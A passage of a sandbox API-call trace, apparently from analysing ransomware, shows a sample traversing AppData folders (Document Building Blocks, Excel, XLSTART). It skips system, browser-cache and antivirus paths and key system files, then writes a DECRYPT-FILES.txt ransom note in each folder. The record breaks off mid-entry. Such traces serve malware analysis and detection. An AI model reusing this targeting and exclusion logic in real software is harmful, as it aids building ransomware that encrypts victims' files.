lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0077.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\jkbimi8.tmp" [0077.786] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.787] CloseHandle (hObject=0x0) returned 0 [0077.787] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.787] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.787] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.787] CloseHandle (hObject=0x448) returned 1 [0077.787] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0077.787] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0077.787] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0077.787] lstrcatW (in: lpString1="Excel", lpString2="\\" | out: lpString1="Excel\\") returned="Excel\\" [0077.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Excel\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Program Files") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch=":\\Windows") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Games\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\All Users") returned 0x0 [0077.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.788] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.788] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.788] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="AhnLab") returned 0x0 [0077.788] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0077.788] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.788] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\jkbimi8.tmp") returned 74 [0077.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0077.788] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.788] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\DECRYPT-FILES.txt") returned 80 [0077.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.789] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.790] CloseHandle (hObject=0x44c) returned 1 [0077.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0077.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0077.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.791] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.791] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.791] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.791] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.791] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.791] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.791] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.791] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.791] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.791] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.791] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0077.791] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.791] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" [0077.791] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\jkbimi8.tmp" [0077.791] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.792] CloseHandle (hObject=0x0) returned 0 [0077.792] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.792] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0077.792] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0077.792] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0077.792] lstrcatW (in: lpString1="XLSTART", lpString2="\\" | out: lpString1="XLSTART\\") returned="XLSTART\\" [0077.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="XLSTART\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Program Files") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch=":\\Windows") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Games\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\All Users") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="AhnLab") returned 0x0 [0077.792] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0077.793] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.793] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\jkbimi8.tmp") returned 82 [0077.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0077.793] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.793] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\DECRYPT-FILES.txt") returned 88 [0077.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.793] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.794] CloseHandle (hObject=0x454) returned 1 [0077.794] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0077.795] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0077.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.795] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.795] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.795] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.795] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.795] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.795] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.795] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.795] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.795] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.795] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.795] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.795] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.795] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.795] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0077.795] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.795] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0077.795] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\jkbimi8.tmp" [0077.795] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.796] CloseHandle (hObject=0x0) returned 0 [0077.796] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.796] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.796] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.796] CloseHandle (hObject=0x450) returned 1 [0077.796] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, 